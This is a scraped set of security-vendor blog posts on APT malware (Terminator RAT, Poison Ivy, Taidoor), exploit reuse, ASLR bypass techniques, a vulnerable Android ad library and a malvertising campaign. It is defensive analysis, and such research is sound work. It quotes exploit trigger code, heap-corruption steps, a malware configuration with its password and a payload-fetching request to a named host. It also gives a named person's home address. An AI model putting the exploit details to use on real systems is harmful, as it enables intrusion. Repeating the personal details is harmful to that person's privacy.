Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache


An increasing number of threat groups now have access to CVE-2013-3906. These threat groups include those that use the Taidoor and PlugX malware families to conduct targeted attacks. We expect this exploit to continue to proliferate among threat groups engaged in APT activity.


1.  The MD5 hashes for Arx group samples that dropped Napolar are:  5e4b83fd11050075a2d4913e6d81e553  and f6c788916cf6fafa202494658e0fe4ae. The CnC server was: /

Evasive Tactics: Terminator RAT

FireEye Labs has been tracking a variety of advanced persistent threat (APT) actors that have been slightly changing their tools, techniques, and procedures (TTPs) in order to evade network defenses. Earlier, we documented changes to Taidoor, a malware family that is being used in ongoing cyber-espionage campaigns particularly against entities in Taiwan. In this post we will explore changes made to Terminator RAT (Remote Access Tool) by examining a recent attack against entities in Taiwan.

We recently analyzed a sample that we suspect was sent via spear-phishing emails to targets in Taiwan. As shown in Figure 1, the adversary sends a malicious Word document, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7), that exploits CVE-2012-0158, which subsequently drops a malware installer named “DW20.exe”. This particular malware is interesting because of the following:

  • It evades sandbox by terminating and removing itself (DW20.exe) after installing. Malicious behavior will only appear after reboot.
  • It deters single-object based sandbox by segregation of roles between collaborating malwares. The RAT (svchost_.exe) will collaborate with its relay (sss.exe) to communicate with the command and control server.
  • It deters forensics investigation by changing the startup location.
  • It deters file-based scanning that implements a maximum file size filter, by expanding the size of svchost_.exe to 40MB.

The ultimate payload of the attack is Terminator RAT, which is also known as FakeM RAT. This RAT does not appear to be exclusively used by a single APT actor, but is most likely being used in a variety (of possibly otherwise unrelated) campaigns. In the past, this RAT has been used against Tibetan and Uyghur activists, and we are seeing an increasing number of attacks targeting Taiwan as well.

However, these attacks use some evasive tactics that demonstrate the evolution of Terminator RAT. First, the attackers have included a component that relays traffic between the malware and a proxy server. Second, they have modified the 32-byte magic header that in previous versions attempted to disguise itself to look like either MSN Messenger, Yahoo! Messenger, or HTML code.

These modifications appear to be an attempt to evade network defenses, perhaps in response to defender’s increasing knowledge of the indicators of compromise associated with this malware. We will discuss the individual components of this attack in more detail.

[caption id="attachment_3596" align="alignnone" width="585"]Figure 1 Figure 1[/caption]


1.   DW20.exe (MD5: 7B18E1F0CE0CB7EEA990859EF6DB810C)


DW20.exe was found to be the installation executable file. It will first create its working folders located at “%UserProfile%\Microsoft” and “%AppData%\2019”. The former is used to store the configurations and executable files (svchost_.exe and sss.exe) and the latter is used to store the shortcut link files. This folder “2019” was then configured to be the new start up folder location by changing the registry “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup" with the location of its path (see Figure 2).

[caption id="attachment_3597" align="alignnone" width="575"]Figure 2 Figure 2[/caption]

The executable file “sss.exe” was found to be the decrypted form of the resource named 140 with type “ACCELORATOR” (likely misspelling of Accelerator - see Figure 3). This resource was decrypted using customized XTEA algorithm and appended with an encrypted configuration for the domains and ports.

[caption id="attachment_3598" align="alignnone" width="307"]Figure 3 Figure 3[/caption]

After installation, DW20.exe deletes and terminates itself. The malwares will only run after reboot. This is one effective way to evade sandbox automatic analysis, as malicious activity will only reveal after a reboot.


2.   sss.exe (MD5: 93F51B957DA86BDE1B82934E73B10D9D)


sss.exe is an interesting malware component. As a researcher would analyze it independently, it is not considered a malicious program. This component plays the role as a network relay between the malware and the proxy server, by listening over port 8000. To achieve this, it first tries to identify the list of proxy servers that are used within the system using “WinHttpGetIEProxyConfigForCurrentUser”, and the discovered proxy servers and related ports are stored in the same directory in a file named “PROXY” (see Figure 4).

[caption id="attachment_3599" align="alignnone" width="425"]Figure 4 Figure 4[/caption]

When there is a new incoming TCP connection over port 8000, it will attempt to create a local to proxy socket connection. With that, it will check connectivity with the CnC server. If the response is 200, it will then start to create a “relay link” between the malware and the CnC server (see Figure 5). The “relay link” was created using two threads, where one thread will transfer data from socket 1 to socket 2 (see Figure 6) and the other will do vice versa.

[caption id="attachment_3600" align="alignnone" width="654"]Figure 5 Figure 5[/caption]


[caption id="attachment_3601" align="alignnone" width="497"]Figure 6 Figure 6[/caption]

As depicted in Figure 7, the user agent is hard coded. It is a possible means to identify potentially malicious traffic, as Internet Explorer 6 is significantly outdated and “MSIE” is not a valid version token.


Figure 7
Figure 7


The configurations for the malicious domains and ports to use are located at the last 188 bytes of the executable file (see Figure 8). The first 16 bytes is the key (boxed in red) to decrypt the remaining content using modified XTEA algorithm (see Figure 9). The two malicious domains found were “” and “”

[caption id="attachment_3603" align="alignnone" width="645"]Figure 8 Figure 8[/caption]

[caption id="attachment_3604" align="alignnone" width="639"]Figure 9 Figure 9[/caption]


3.   Network Traffic


The Terminator sample we analyzed, “103.doc” (md5: a130b2e578d82409021b3c9ceda657b7) was not configured with fake HTML, Yahoo Messenger, or Windows Messenger traffic header as it had in past variants. However, the content is encrypted in exactly the same way as previous versions of Terminator RAT.

[caption id="attachment_3605" align="alignnone" width="648"]Figure 10 Figure 10[/caption]

The decrypted content reveals that the malware is sending back the user name, the computer name and a campaign mark of “zjz1020”.

[caption id="attachment_3606" align="alignnone" width="683"]Figure 11 Figure 11[/caption]

This particular sample is configured to one of two command and control servers:



  • /
  • /

We have located another malicious document that has a Taiwan-related decoy document that drops this same version of Terminator RAT.

[caption id="attachment_3607" align="alignnone" width="583"]Figure 12 Figure 12[/caption]

The sample we analyzed (md5: 50d5e73ff8a0693ed2ee2d320af3b304) exploits CVE-2012-0158 and has the following command and control server:

  •  /

The command and control servers for both samples resolved to IP addresses in the same class C network.


4.   Campaign Connections


In June 2013, we investigated an attack against entities in Taiwan that used spear-phishing emails to deliver a malicious attachment.

[caption id="attachment_3608" align="alignnone" width="455"]Figure 13 Figure 13[/caption]

The malicious attachment "標案資料.doc" (md5: bfc96694731f3cf39bcad6e0716c5746) exploited a vulnerability in Microsoft Office (CVE-2012-0158), however, the payload in this case was a different malware family known as WinData. The malware connected to the same command and control server,, but the callback is quite different:

XYZ /WinData.DLL?HELO-STX-1*1[IP Address]*[Computer Name]*0605[MAC:[Mac Address]]$

In a separate case where has been used as the command and control server, the payload was neither WinData nor Terminator RAT, but another type of malware known as Protux. The sample we analyzed in August 2012 for this case was “幹!.doc” (md5: 01da7213940a74c292d09ebe17f1bd01).

This particular threat actor has access to a variety of malware families and has been using them to target entities in Taiwan for more than a year.




Terminator RAT is an example of how malware are increasingly becoming more sophisticated and harder to detect. There is a need for continual research to understand various techniques, tactics, and procedures used by the adversaries. Detection of exploitation and identification of anomalous callbacks are becoming extremely critical in preventing the malware from installing into the system or phoning back to the command control servers.


Update: Ad Vulna Continues

This is an update to our earlier blog “Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions”.

Since our last notification to Google and Ad Vulna (code name for anonymity), we have noticed a number of changes to the impacted apps that we reported to both companies. We summarize our observations below, although we do not have specific information about the reasons that caused these changes we are reporting.

First, a number of these vulnaggressive apps and their developers’ accounts have been removed from Google Play, such as app developer "Itch Mania". The total number of downloads of these apps was more than 6 million before the removal. While removing these apps from Google Play prevents more people from being affected, the millions of devices that already downloaded them remain vulnerable.

Second, a number of apps from the list that we reported to Google and Ad Vulna have updated the ad library included in the app to the newest version which fixes many of the security issues we found. Moreover, a number of other apps, such as “Mr. Number Blocker” with more than 5 million downloads, have simply removed Ad Vulna. The total number of downloads of these apps before they were updated was more than 26 million. Unfortunately, many users do not update their downloaded apps often and older versions of android does not auto-update apps, so millions of users of these apps will remain vulnerable until they update to the latest version of the apps.

From our current analysis, there are still many other apps using the vulnaggressive versions of the ad library Ad Vulna on Google Play, with more than 166 million downloads in total. FireEye recently announced FireEye Mobile Threat Prevention. It is uniquely capable of protecting its customers from such threats.

We are glad to see that security researchers, practitioners, and users worldwide are becoming more aware of the security risks brought by this new class of vulnaggressive threats after our last blog.

ASLR Bypass Apocalypse in Recent Zero-Day Exploits

ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operation systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR.

Here are just a few interesting bypass techniques that we have tracked in the past year:

  • Using non-ASLR modules
  • Modifying the BSTR length/null terminator
  • Modifying the Array object

The following sections explain each of these techniques in detail.

Non-ASLR modules

Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL.

MSVCR71.DLL, JRE 1.6.x is shipped an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations:

  • Windows 7 and Internet Explorer 8
  • Windows 7 and Internet Explorer 9

HXDS.DLL, shipped from MS Office 2010/2007, is not compiled with ASLR. This technique was first described in here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL.

The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE2013-1347, CVE-2012-4969, CVE-2012-4792.


The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack.

Modify the BSTR length/null terminator

This technique first appears in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer.

The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP.

Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses.


The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable:


Consider the following memory layout before the DEC operation:

[string][null][non-null data][object]

After the DEC operation (in my tests, it is decreased twice) the memory becomes:

[string][\xfe][non-null data][object]

For further details, refer to the technique write-up from the immunityinc’s blog.


This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout.

Modify the Array object

The array object length modification is similar to the BSTR length modification: they both require a certain class of “user-friendly” vulnerabilities. Even batter, from the attacker’s view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution.

Here is the list of known zero-day exploits using this technique:


This exploit involves Adobe Flash player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get base address of flash.ocx.

Here’s how the exploit works:

  1. Set up a continuous memory layout by allocating the following objects":13
  2. Free the <Number> object at index 1 of the above objects as follows:

    obj[1] = null;
  3. Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows:

    boom = "(?i)()()(?-i)||||||||||||||||||||||||";
    var trigger = new RegExp(boom, "");

Later, the malformed expression overwrites the length of a Vector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload.


This vulnerability involves a IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated.

Basically, this vulnerability modifies the arbitrary memory content using an OR instruction. This instruction is something like the following:

or dword ptr [esi+8],20000h

Here’s how it works:

  1. First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:.12
  2. After the spray, those objects are stored aligned in a stable memory address. For example:1

    The first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow marked values correspond to the values in above spray code.

  3. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size.
  4. With the larger access range, the attacker can change the next object length to 0x3FFFFFF0.14
  5. From there, the attacker can access the whole memory space in the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass the DEP as follows:9

By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search the sound object in memory and overwrite it’s vftable to point to ROP payload and shellcode.


The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0x0001 into an arbitrary memory location as follows:


In above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside the setImageAnimationMode(), the code looks like the following:


In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004.


After triggering the vulnerability, the attacker increases the size of the array to to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read to or write from memory with the corrupted ArrayBuffer. In this case, the attacker choose to disclosure the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload.


This vulnerability involves a JAVA CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution.

The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented.


The following table outlines recent APT zero-day exploits and what bypass techniques they used:



ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using Microsoft Office non-ASLR DLL to bypass it, and Microsoft also did some mitigation in their latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit technique. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version.

Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public.

But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them.

Thanks again to Dan Caselden and Yichong Lin for their help with this analysis.

Ad Vulna: A Vulnaggressive (Vulnerable & Aggressive) Adware Threatening Millions

FireEye researchers have discovered a rapidly-growing class of mobile threats represented by a popular ad library affecting apps with over 200 million downloads in total. This ad library, anonymized as "Vulna," is aggressive at collecting sensitive data and is able to perform dangerous operations such as downloading and running new components on demand. Vulna is also plagued with various classes of vulnerabilities that enable attackers to turn Vulna's aggressive behaviors against users. We coined the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics. Most vulnaggresive libraries are proprietary and it is hard for app developers to know their underlying security issues. Legitimate apps using vulnaggressive libraries present serious threats for enterprise customers. FireEye has informed both Google and the vendor of Vulna about the security issues and they are actively addressing it.

Recently FireEye discovered a new mobile threat from a popular ad library that no other anti-virus or security vendor has reported publicly before. Mobile ad libraries are third-party software included by host apps in order to display ads. Because this library’s functionality and vulnerabilities can be used to conduct large-scale attacks on millions of users, we refer to it anonymously by the code name “Vulna” rather than revealing its identity in this blog.

We have analyzed all Android apps with over one million downloads on Google Play, and we found that over 1.8% of these apps used Vulna. These affected apps have been downloaded more than 200 million times in total.

Though it is widely known that ad libraries present privacy risks such as collecting device identifiers (IMEI, IMSI, etc.) and location information, Vulna presents far more severe security issues. First, Vulna is aggressive—if instructed by its server, it will collect sensitive information such as text messages, phone call history, and contacts. It also performs dangerous operations such as executing dynamically downloaded code. Second, Vulna contains a number of diverse vulnerabilities. These vulnerabilities when exploited allow an attacker to utilize Vulna’s risky and aggressive functionality to conduct malicious activity, such as turning on the camera and taking pictures without user’s knowledge, stealing two-­factor authentication tokens sent via SMS, or turning the device into part of a botnet.

We coin the term “vulnaggressive” to describe this class of vulnerable and aggressive characteristics.

The following is a sample of the aggressive behaviors and vulnerabilities we have discovered in Vulna:

  • Aggressive Behaviors

    • In addition to collecting information used for targeting and tracking such as device identifiers and location, as many ad libraries do, Vulna also collects the device owner's email address and the list of apps installed on the device. Furthermore, Vulna has the ability to read text messages, phone call history, and contact list, and share this data publicly without any access control through a web service that it starts on the device.

    • Vulna will download arbitrary code and execute it when instructed by the remote server.

  • Vulnerabilities

    • Vulna transfers user’s private information over HTTP in plain text, which is vulnerable to eavesdropping attacks.

    • Vulna also uses unsecured HTTP for receiving commands and dynamically loaded code from its control server. An attacker can convert Vulna to a botnet by hijacking its HTTP traffic and serving malicious commands and code.

    • Vulna uses Android’s WebView with JavaScript-­to-­Java bindings in an insecure way. An attacker can exploit this vulnerability and serve malicious JavaScript code to perform harmful operations on the device. This vulnerability is an instance of a common JavaScript binding vulnerability which has been estimated to affect over 90% of Android devices.

      Vulna’s aggressive behaviors and vulnerabilities expose Android users, especially enterprise users, to serious security threats. By exploiting Vulna’s vulnaggressive behaviors, an attacker could download and execute arbitrary code on user’s device within Vulna's host app. From our study, many host apps containing Vulna have powerful permissions that allow controlling the camera; reading and/or writing SMS messages, phone call history, contacts, browser history and bookmarks; and creating icons on home screen. An attacker could utilize these broad permissions to perform malicious actions. For example, attackers could:

      • steal two-factor authentication token sent via SMS
      • view photos and other files on the SD card
      • install icons used for phishing attacks on the home screen
      • delete files and destroy data on demand
      • impersonate the owner and send forged text messages to business partners
      • delete incoming text messages without the user’s notice
      • place phone calls
      • use the camera to take photos without user’s notice
      • read bookmarks or change them to point to phishing sites

      There are many possible ways an attacker could exploit Vulna’s vulnerabilities. One example is public WiFi hijacking: when the victim’s device connects to a public WiFi hotspot (such as at a coffee shop or an airport), an attacker nearby could eavesdrop on Vulna’s traffic and inject malicious commands and code.

      Attackers can also conduct DNS hijacking to attack users around the world, as in the Syrian Electronic Army’s recent attacks targeting Twitter, the New York Times, and Huffington Post. In a DNS hijacking attack, an attacker could modify the DNS records of Vulna’s ad servers to redirect visitors to their own control server, in order to gather information from or send malicious commands to Vulna on the victim’s device.

      Despite the severe threats it poses, Vulna is stealthy and hard to detect:

      • Vulna receives commands from its ad server using data encoded in HTTP header fields instead of the HTTP response body.

      • Vulna obfuscates its code, which makes traditional analysis difficult.

      • Vulna's behaviors can be difficult to trigger using traditional analysis. For example, in one popular game, Vulna is executed only at certain points in the game, such as when a specific level is reached, as shown in the figure below. (The figure has been partially blurred to hide the identity of the app.) When Vulna is executed, the only effect visible to the user is the ad on top of the screen. However, Vulna quietly executes its risky behaviors in the background.

        Vulna's screen shot

      FireEye Mobile Threat Prevention applies a unique approach and technology that made it possible to discover the security issues outlined in this post quickly and accurately despite these challenges. We have provided information about the discovered security issues,  the list of impacted apps and suggestions to both Google and the vendor of Vulna. They have confirmed the issues and they are actively addressing it.

      In conclusion, we have discovered a new mobile threat from a popular ad library (codenamed "Vulna" for anonymity). This library is included in popular apps on Google Play which have more than 200 million downloads in total. Vulna is an instance of a rapidly­-growing class of mobile threat, which we have termed vulnaggressive ad libraries. Vulnaggressive ad libraries are disturbingly aggressive at collecting users’ sensitive data and embedding capabilities to execute dangerous operations on demand, and they also contain different classes of vulnerabilities which allow attackers to utilize their aggressive behaviors to harm users. App developers using these third-party libraries are often not aware of the security issues in them. These threats are particularly serious for enterprise customers. Furthermore, this vulnaggressive characteristic is not just limited to ad libraries; it also applies to other third-party components and apps.


      Special thanks to FireEye team members Adrian Mettler, Peter Gilbert, Prashanth Mohan, and Andrew Osheroff for their valuable help on writing this blog. We also thank Zheng Bu and Raymond Wei for their valuable comments and feedback.

      Appendix: Sample code snippet of collecting and sending call logs in Vulna


      class x implements Runnable




      List localList = get_call_log();




      List get_call_log()


      ArrayList localArrayList = new ArrayList();

      Cursor cur1 = getContentResolver().query(CallLog.Calls.CONTENT_URI,

      new String[] { "number", "type", "date" }, null, null,

      "date DESC limit 10");

      cur2 = cur1;

      if (cur2 != null){

      int i = cur2.getColumnIndex("number");

      int j = cur2.getColumnIndex("type");

      while (cur2.moveToNext()){

      String str = cur2.getString(i);

      if ((cur2.getInt(j)==2) && (!localArrayList.contains(str)))




      return localArrayList;


Another Darkleech Campaign

Last week got us up close and personal with Darkleech and Blackhole with our external careers web site.

The fun didn’t end there, this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL:


Again Darkleech was up to its tricks, injecting URLs and sending victims to a landing page belonging to the Blackhole Exploit Kit, one of the most popular and effective exploit kits available today. Blackhole wreaks havoc on computers by exploiting vulnerabilities in client applications like IE, Java and Adobe, computers that are vulnerable to exploits launched by Blackhole are likely to become infected with one of several flavors of malware including ransomware, Zeus/Zbot variants and clickfraud trojans like ZeroAccess.

We started logging hits at 21:31:00 UTC on Sunday 09/22/2013, the campaign has been ongoing, peaking Monday and tapered down through out the week.

During most of the campaign’s run, delivery[.]globalcdnnode[.]com appeared to have gone dark, no longer serving the exploit kit’s landing page as expected and then stopped resolving altogether, yet tons of requests kept flowing.

This left some scratching their heads as to whether the noise was a real threat.

Indeed, it was a real threat, as Blackhole showed up to the party a couple of days later; this was confirmed by actually witnessing a system get attacked on a subsequent visit to the URL.



Figure 1. – Session demonstrating exploit via IE browser and Java.


The server returned the (obfuscated) Blackhole Landing page; no 404 this time.


Figure 2 – request and response to to delivery[.]globalcdnnode[.]com.


The next stage was to load a new URL for the malicious jar file. At this point, the unpatched Windows XP system running vulnerable Java quickly succumbed to CVE-2013-0422.


Figure 3 – Packet capture showing JAR file being downloaded.


Figure 4. – Some of the Java class files visible in the downloaded Jar.


Even though our system was exploited and the browser was left in a hung state, it did not receive the payload. Given the sporadic availability during the week of both the host and exploit kit’s landing page, it’s possible the system is or was undergoing further setup and this is the prelude to yet another large-scale campaign.

We can’t say for sure but we know this is not the last time we will see it or the crimeware actor behind it.


Name: Alexey Prokopenko
Organization: home
Address: Lenina 4, kv 1
City: Ubileine
Province/state: LUGANSKA OBL
Country: UA
Postal Code: 519000
Email: alex1978a

By the way, this actor has a long history of malicious activity online too.

The campaign also appears to be abusing Amazon Web Services.
origin =
mail addr =

At time of this writing, the domain delivery[.]globalcdnnode[.]com was still resolving, using fast-flux DNS techniques to resolve to a different IP address every couple minutes, thwarting attempts at shutting down the domain by constantly being on the move.


Figure 5. – The familiar Plesk control panel, residing on the server.

This was a widespread campaign, indirectly affecting many web sites via malvertising techniques. The referring hosts run the gamut from local radio stations to high profile news, sports, and shopping sites. Given the large amounts of web traffic these types of sites see, its not surprising there was a tidal wave of requests to delivery[.]globalcdnnode[.]com. Every time a page with the malvertisement was loaded, a request was made to hXXp://, in the background.

To give an example of what this activity looked like from DTI, you can see the numbers in the chart below.



Figure 6. – DTI graph showing number of Darkleech detections logged each day.

By using malvertising and or posing as a legitimate advertiser or content delivery network, the bad guys infiltrate the web advertisement ecosystem. This results in their malicious content getting loaded in your browser, often times in the background, while you browse sites that have nothing to do with the attack (as was the case in our careers site).

Imagine a scenario where a good portion of enterprise users have a home page set to a popular news website. More than likely, the main web page has advertisements, and some of those ads could be served from 3rd party advertiser networks and or CDNs. If just one of those advertisements on the page is malicious, visitors to that page are at risk of redirection and or infection, even though the news website’s server is itself clean.

So, when everybody shows up to work on Monday and opens their browsers, there could be a wave of clients making requests to exploit kit landing pages, if Darkleech is lurking in those advertisement waters, you could end up with a leech or 2 attached to your network.

Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

Since we first reported on Operation DeputyDog, at least three other Advanced Persistent Threat (APT) campaigns known as Web2Crew, Taidoor, and th3bug have made use of the same exploit to deliver their own payloads to their own targets. It is not uncommon for APT groups to hand-off exploits to others, who are lower on the zero-day food chain – especially after the exploit becomes publicly available. Thus, while the exploit may be the same, the APT groups using them are not otherwise related.

In addition, APT campaigns may reuse existing infrastructure for new attacks. There have been reports that the use of CVE-2013-3893 may have begun in July; however, this determination appears to be based solely on the fact that the CnC infrastructure used in DeputyDog had been previously used by the attackers. We have found no indication that the attackers used CVE-2013-3893 prior to August 23, 2013.

Exploit Reuse

Since the use of CVE-2013-3893 in Operation DeputyDog (which we can confirm happened by at least August 23, 2013), the same exploit was used by different threat actors.


On September 25, 2013, an actor we call Web2Crew utilized CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The exploit was hosted on a server in Taiwan ( and dropped a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the same server. In our recent paper, we document how to extract intelligence from Poison Ivy that can be used to cluster activity.

The Poison Ivy binary used in this attack was configured with the following properties:

ID: gua925

Group: gua925

DNS/Port: Direct:, Direct:,

Proxy DNS/Port:

Proxy Hijack: No

ActiveX Startup Key:

HKLM Startup Entry:

File Name:

Install Path: C:\Documents and Settings\Administrator\Desktop\runrun.exe

Keylog Path: C:\Documents and Settings\Administrator\Desktop\runrun

Inject: No

Process Mutex: ;A>6gi3lW

Key Logger Mutex:

ActiveX Startup: No

HKLM Startup: No

Copy To: No

Melt: No

Persistence: No

Keylogger: No

Password: LostC0ntrol2013~2014

This configuration matches with other Web2Crew particularly ‘gua25’ ID. Some previous Web2Crew Poison Ivy samples have been configured with similar IDs including:







Additionally, the IP address was used to host the command and control server in this attack. A number of known Web2Crew domains previously resolved to this same IP address between August 15 and August 29.

2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-15 2013-08-15
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-16 2013-08-16
2013-08-21 2013-08-21
2013-08-29 2013-08-29
2013-08-29 2013-08-29
2013-08-29 2013-08-29
2013-08-29 2013-08-29

We observed the Web2Crew actor targeting a financial institution in this attack as well as in previous attacks.


The same exploit (CVE-2013-3893) has also been used by another, separate APT campaign. By at least September 26, 2013 a compromised Taiwanese Government website was used to host the same exploit, however, the payload in this case was Taidoor (not DeputyDog malware). The decoded payload has an MD5 of 666603bd2073396b7545d8166d862396. The CnC servers are and

We found another instance of CVE-2013-3893 hosted at www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor binary with the MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6. This Taidoor sample connected to a command and control server at We found this sample targeting the same financial services firm targeted by the web2crew actor discussed above.

Both of these samples were the newer versions of Taidoor that we previously described here.


The actor we refer to as ‘th3bug’ also used CVE-2013-3893 in multiple attacks. Beginning on September 27, compromised websites hosting the Internet Explorer zero-day redirected victims to download a stage one payload (496171867521908540a26dc81b969266) from www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a single byte key of 0x95.

The stage 1 payload then downloaded a PoisonIvy payload (not DeputyDog malware) via the following request:

GET /dev/js/heap.php HTTP/1.1


User-Agent: Mozilla/4.0 (compatible)


Cache-Control: no-cache

The PoisonIvy payload then connected to a command and control server at

The deobfuscated stage 1 payload has a MD5 of 4017d0baa83c63ceff87cf634890a33f and was compiled on September 27, 2013. This may indicate that the th3bug actor also customized the IE zero-day exploit code on September 27, 2013 – well after the actors responsible for the DeputyDog malware weaponized the same exploit.

Infrastructure Reuse

APT groups also reuse CnC infrastructure. It is not uncommon to see a payload call back to the same CnC, even through it has been distributed via different means. For example, although the first reported use of CVE-2013-3893 in Operation DeputyDog was August 23, 2013, the CnC infrastructure had been used in earlier campaigns.

Specifically, one of the reported DeputyDog command and control servers located at had been used in a previous attack in July 2013. During this previous attack, likely executed by the same actor responsible for the DeputyDog campaign, the IP hosted a PoisonIvy control server and was used to target a gaming company as well as high-tech manufacturing company. There is no evidence to suggest that this July attack using Poison Ivy leveraged the same CVE-2013-3893 exploit.

We also observed usage of Trojan.APT.DeputyDog malware as early as March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary (b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in both the high-technology manufacturing and finance verticals. This DeputyDog binary called back to a command and control server at There is also no evidence in this case to suggest that this attack used the CVE-2013-3893 exploit.

This malware family and the CnC infrastructure is part of an ongoing campaign. Therefore, the fact that this infrastructure was active prior to the first reported use of CVE-2013-3893 does not necessarily indicate that this particular exploit was previously used. The actor responsible for the DeputyDog campaign employs a multiple of malware tools and utilizes a diverse command and control infrastructure.


The activity associated with specific APT campaigns can be clustered and tracked by unique indicators. There are a variety of different campaigns that sometimes make use of the same malware (or sometimes widely available malware such as PoisonIvy) and the same exploits. It is not uncommon for zero-day exploits to be handed down to additional APT campaigns after they have already been used.

  • The first observed usage of CVE-2013-3893, in Operation Deputy Dog, remains August 23, 2013. However, the C2 infrastructure had been used in previous attacks in July 2013.
  • The CVE-2013-3893 has been subsequently used by at least three other APT campaigns: Taidoor, th3bug, and Web2Crew. However, other than the common use of the same exploit, these campaigns are otherwise unrelated.
  • We expect that CVE-2013-3893 will continue to be handed down to additional APT campaigns and may eventually find its way into the cyber-crime underground.

Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets

